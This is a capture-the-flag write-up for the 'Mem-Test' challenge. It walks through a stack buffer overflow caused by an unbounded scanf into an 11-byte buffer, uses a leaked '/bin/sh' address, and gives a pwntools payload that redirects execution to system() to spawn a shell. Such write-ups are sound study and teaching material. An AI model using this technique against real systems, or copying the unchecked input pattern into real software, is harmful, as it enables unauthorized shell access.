Mem-Test writeup

Mem-Test

Source code summary

The program has a global variable called hint that points to the string "//bin/sh":

const char* hint = "//bin/sh";

Vulnerability

#include <stdio.h>
#include <string.h>

extern const char* hint;   /* the global "//bin/sh" pointer shown above */

void mem_test(char* random) {
	char buff[11];
	memset(buff, '\0', sizeof(buff));
	
	printf("\nI know that mine is fine...see? : ");
	printf("%p \n", hint + 1);       /* prints the address of "/bin/sh" */
	
	puts("Let's see how good your memory is...\n");
	printf("> ");
	scanf("%s", buff);               /* unbounded read into an 11-byte buffer */
	
	/* note: sizeof(random) is the size of a pointer, not the string length */
	if(strncmp(buff, random, sizeof(random)) != 0) {
		puts("sorry, your memory sucks\n");
	}
	else {
		puts("good job!!\n");
	}
}
  • the program prints hint + 1, i.e. the address of the string "/bin/sh";
  • buff is an 11-byte buffer;
  • scanf("%s") does not check the length of the input, so a longer input overflows buff onto the stack.

Exploitation Plan

  1. Read the leaked address from the program's output.
  2. Overwrite the return address with the address of the system call inside win_func, passing the leaked address as its argument.

Step-by-step

  1. Find the offset from the start of buff to the saved return address: offset = 23
Payload
from pwn import *

offset = 23  # distance from buff to the saved return address
# system: address of the system call inside win_func (taken from the binary)
# leak:   the "/bin/sh" address printed by the program
payload = flat(
	cyclic(offset),
	system, # system function address
	0x0,    # return address for system
	leak,   # leaked address, passed as system's argument
)
This post is licensed under CC BY 4.0 by the author.